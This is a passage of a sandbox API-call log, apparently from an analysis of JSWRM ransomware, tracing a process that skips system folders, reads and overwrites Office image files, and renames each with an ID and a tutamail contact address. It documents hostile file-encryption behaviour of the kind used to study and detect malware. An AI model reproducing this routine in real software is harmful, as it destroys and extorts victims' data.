[0131.079] lstrcmpiW (lpString1="MessageHistoryIconImagesMask.bmp", lpString2="perflogs") returned -1 [0131.079] lstrcmpiW (lpString1="MessageHistoryIconImagesMask.bmp", lpString2="documents and settings") returned 1 [0131.079] lstrcmpiW (lpString1="MessageHistoryIconImagesMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.079] lstrcmpiW (lpString1="MessageHistoryIconImagesMask.bmp", lpString2="system volume information") returned -1 [0131.079] lstrcmpiW (lpString1="MessageHistoryIconImagesMask.bmp", lpString2="msocache") returned -1 [0131.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageHistoryIconImagesMask.bmp", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0131.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageHistoryIconImagesMask.bmp", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MessageHistoryIconImagesMask.bmp", lpUsedDefaultChar=0x0) returned 32 [0131.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageHistoryIconImagesMask.bmp", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0131.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MessageHistoryIconImagesMask.bmp", cchWideChar=32, lpMultiByteStr=0x22d0d8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MessageHistoryIconImagesMask.bmp", lpUsedDefaultChar=0x0) returned 32 [0131.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.079] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\MessageHistoryIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\messagehistoryiconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.080] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=320) returned 1 [0131.080] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.080] ReadFile (in: hFile=0x314, lpBuffer=0x21c578, nNumberOfBytesToRead=0x140, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesRead=0x345e534*=0x140, lpOverlapped=0x0) returned 1 [0131.081] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.081] WriteFile (in: hFile=0x314, lpBuffer=0x21c578*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesWritten=0x345e530*=0x140, lpOverlapped=0x0) returned 1 [0131.081] CloseHandle (hObject=0x314) returned 1 [0131.081] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\MessageHistoryIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\messagehistoryiconimagesmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\MessageHistoryIconImagesMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\messagehistoryiconimagesmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.082] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198634b7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3efd, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="NotifierBackground.jpg", cAlternateFileName="NOBDD0~1.JPG")) returned 1 [0131.082] lstrcmpiW (lpString1="NotifierBackground.jpg", lpString2=".") returned 1 [0131.082] lstrcmpiW (lpString1="NotifierBackground.jpg", lpString2="..") returned 1 [0131.082] lstrcmpiW (lpString1="NotifierBackground.jpg", lpString2="...") returned 1 [0131.083] lstrcmpiW (lpString1="NotifierBackground.jpg", lpString2="windows") returned -1 [0131.083] lstrcmpiW (lpString1="NotifierBackground.jpg", lpString2="recovery") returned -1 [0131.083] lstrcmpiW (lpString1="NotifierBackground.jpg", lpString2="perflogs") returned -1 [0131.083] lstrcmpiW (lpString1="NotifierBackground.jpg", lpString2="documents and settings") returned 1 [0131.083] lstrcmpiW (lpString1="NotifierBackground.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.083] lstrcmpiW (lpString1="NotifierBackground.jpg", lpString2="system volume information") returned -1 [0131.083] lstrcmpiW (lpString1="NotifierBackground.jpg", lpString2="msocache") returned 1 [0131.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierBackground.jpg", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0131.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierBackground.jpg", cchWideChar=22, lpMultiByteStr=0x240fc0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierBackground.jpg", lpUsedDefaultChar=0x0) returned 22 [0131.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierBackground.jpg", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0131.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierBackground.jpg", cchWideChar=22, lpMultiByteStr=0x2412b8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierBackground.jpg", lpUsedDefaultChar=0x0) returned 22 [0131.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierBackground.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierbackground.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.084] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=16125) returned 1 [0131.084] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.084] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3ef0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x3ef0, lpOverlapped=0x0) returned 1 [0131.087] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.087] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3ef0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x3ef0, lpOverlapped=0x0) returned 1 [0131.087] CloseHandle (hObject=0x314) returned 1 [0131.087] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierBackground.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierbackground.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierBackground.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierbackground.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.088] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197321ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197321ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x40aa, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="NotifierBackgroundRTL.jpg", cAlternateFileName="NOTIFI~4.JPG")) returned 1 [0131.088] lstrcmpiW (lpString1="NotifierBackgroundRTL.jpg", lpString2=".") returned 1 [0131.088] lstrcmpiW (lpString1="NotifierBackgroundRTL.jpg", lpString2="..") returned 1 [0131.088] lstrcmpiW (lpString1="NotifierBackgroundRTL.jpg", lpString2="...") returned 1 [0131.088] lstrcmpiW (lpString1="NotifierBackgroundRTL.jpg", lpString2="windows") returned -1 [0131.088] lstrcmpiW (lpString1="NotifierBackgroundRTL.jpg", lpString2="recovery") returned -1 [0131.088] lstrcmpiW (lpString1="NotifierBackgroundRTL.jpg", lpString2="perflogs") returned -1 [0131.088] lstrcmpiW (lpString1="NotifierBackgroundRTL.jpg", lpString2="documents and settings") returned 1 [0131.088] lstrcmpiW (lpString1="NotifierBackgroundRTL.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.088] lstrcmpiW (lpString1="NotifierBackgroundRTL.jpg", lpString2="system volume information") returned -1 [0131.088] lstrcmpiW (lpString1="NotifierBackgroundRTL.jpg", lpString2="msocache") returned 1 [0131.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierBackgroundRTL.jpg", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0131.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierBackgroundRTL.jpg", cchWideChar=25, lpMultiByteStr=0x241268, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierBackgroundRTL.jpg", lpUsedDefaultChar=0x0) returned 25 [0131.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierBackgroundRTL.jpg", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0131.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierBackgroundRTL.jpg", cchWideChar=25, lpMultiByteStr=0x241038, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierBackgroundRTL.jpg", lpUsedDefaultChar=0x0) returned 25 [0131.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.088] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierBackgroundRTL.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierbackgroundrtl.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.089] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=16554) returned 1 [0131.089] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.090] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x40a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x40a0, lpOverlapped=0x0) returned 1 [0131.092] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.092] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x40a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x40a0, lpOverlapped=0x0) returned 1 [0131.092] CloseHandle (hObject=0x314) returned 1 [0131.092] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierBackgroundRTL.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierbackgroundrtl.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierBackgroundRTL.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierbackgroundrtl.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.093] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197321ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197321ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19758458, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f2, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="NotifierCloseButton.jpg", cAlternateFileName="NO00D7~1.JPG")) returned 1 [0131.093] lstrcmpiW (lpString1="NotifierCloseButton.jpg", lpString2=".") returned 1 [0131.093] lstrcmpiW (lpString1="NotifierCloseButton.jpg", lpString2="..") returned 1 [0131.093] lstrcmpiW (lpString1="NotifierCloseButton.jpg", lpString2="...") returned 1 [0131.093] lstrcmpiW (lpString1="NotifierCloseButton.jpg", lpString2="windows") returned -1 [0131.093] lstrcmpiW (lpString1="NotifierCloseButton.jpg", lpString2="recovery") returned -1 [0131.093] lstrcmpiW (lpString1="NotifierCloseButton.jpg", lpString2="perflogs") returned -1 [0131.094] lstrcmpiW (lpString1="NotifierCloseButton.jpg", lpString2="documents and settings") returned 1 [0131.094] lstrcmpiW (lpString1="NotifierCloseButton.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.094] lstrcmpiW (lpString1="NotifierCloseButton.jpg", lpString2="system volume information") returned -1 [0131.094] lstrcmpiW (lpString1="NotifierCloseButton.jpg", lpString2="msocache") returned 1 [0131.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierCloseButton.jpg", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0131.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierCloseButton.jpg", cchWideChar=23, lpMultiByteStr=0x241218, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierCloseButton.jpg", lpUsedDefaultChar=0x0) returned 23 [0131.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierCloseButton.jpg", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0131.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierCloseButton.jpg", cchWideChar=23, lpMultiByteStr=0x241380, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierCloseButton.jpg", lpUsedDefaultChar=0x0) returned 23 [0131.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierCloseButton.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierclosebutton.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.095] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=754) returned 1 [0131.095] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.095] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x2f0, lpOverlapped=0x0) returned 1 [0131.096] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.096] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x2f0, lpOverlapped=0x0) returned 1 [0131.096] CloseHandle (hObject=0x314) returned 1 [0131.096] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierCloseButton.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierclosebutton.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierCloseButton.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierclosebutton.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.097] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197321ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197321ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="NotifierDisableDownArrow.jpg", cAlternateFileName="NOTIFI~2.JPG")) returned 1 [0131.097] lstrcmpiW (lpString1="NotifierDisableDownArrow.jpg", lpString2=".") returned 1 [0131.097] lstrcmpiW (lpString1="NotifierDisableDownArrow.jpg", lpString2="..") returned 1 [0131.097] lstrcmpiW (lpString1="NotifierDisableDownArrow.jpg", lpString2="...") returned 1 [0131.097] lstrcmpiW (lpString1="NotifierDisableDownArrow.jpg", lpString2="windows") returned -1 [0131.098] lstrcmpiW (lpString1="NotifierDisableDownArrow.jpg", lpString2="recovery") returned -1 [0131.098] lstrcmpiW (lpString1="NotifierDisableDownArrow.jpg", lpString2="perflogs") returned -1 [0131.098] lstrcmpiW (lpString1="NotifierDisableDownArrow.jpg", lpString2="documents and settings") returned 1 [0131.098] lstrcmpiW (lpString1="NotifierDisableDownArrow.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.098] lstrcmpiW (lpString1="NotifierDisableDownArrow.jpg", lpString2="system volume information") returned -1 [0131.098] lstrcmpiW (lpString1="NotifierDisableDownArrow.jpg", lpString2="msocache") returned 1 [0131.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierDisableDownArrow.jpg", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0131.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierDisableDownArrow.jpg", cchWideChar=28, lpMultiByteStr=0x241268, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierDisableDownArrow.jpg", lpUsedDefaultChar=0x0) returned 28 [0131.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierDisableDownArrow.jpg", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0131.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NotifierDisableDownArrow.jpg", cchWideChar=28, lpMultiByteStr=0x241380, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NotifierDisableDownArrow.jpg", lpUsedDefaultChar=0x0) returned 28 [0131.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierDisableDownArrow.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierdisabledownarrow.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.099] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=716) returned 1 [0131.099] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.099] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2c0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x2c0, lpOverlapped=0x0) returned 1 [0131.104] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.104] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x2c0, lpOverlapped=0x0) returned 1 [0131.104] CloseHandle (hObject=0x314) returned 1 [0131.104] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierDisableDownArrow.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierdisabledownarrow.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolBMPs\\NotifierDisableDownArrow.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolbmps\\notifierdisabledownarrow.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.105] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x197321ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x197321ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x197a4903, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="NotifierDisableUpArrow.jpg", cAlternateFileName="NOTIFI~1.JPG")) returned 1 [0131.106] lstrcmpiW (lpString1="NotifierDisableUpArrow.jpg", lpString2=".") returned 1 [0131.106] lstrcmpiW (lpString1="NotifierDisableUpArrow.jpg", lpString2="..") returned 1 [0131.106] lstrcmpiW (lpString1="NotifierDisableUpArrow.jpg", lpString2="...") returned 1 [0131.106] lstrcmpiW (lpString1="NotifierDisableUpArrow.jpg", lpString2="windows") returned -1 [0131.106] lstrcmpiW (lpString1="NotifierDisableUpArrow.jpg", lpString2="recovery") returned -1 [0131.106] lstrcmpiW (lpString1="NotifierDisableUpArrow.jpg", lpString2="perflogs") returned -1 [0131.106] lstrcmpiW (lpString1="NotifierDisableUpArrow.jpg", lpString2="documents and settings") returned 1 [0131.106] lstrcmpiW (lpString1="NotifierDisableUpArrow.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.106] lstrcmpiW (lpString1="NotifierDisableUpArrow.jpg", lpString2="system volume information") returned -1 [0131.106] lstrcmpiW (lpString1="NotifierDisableUpArrow.jpg", lpString2="msocache") returned 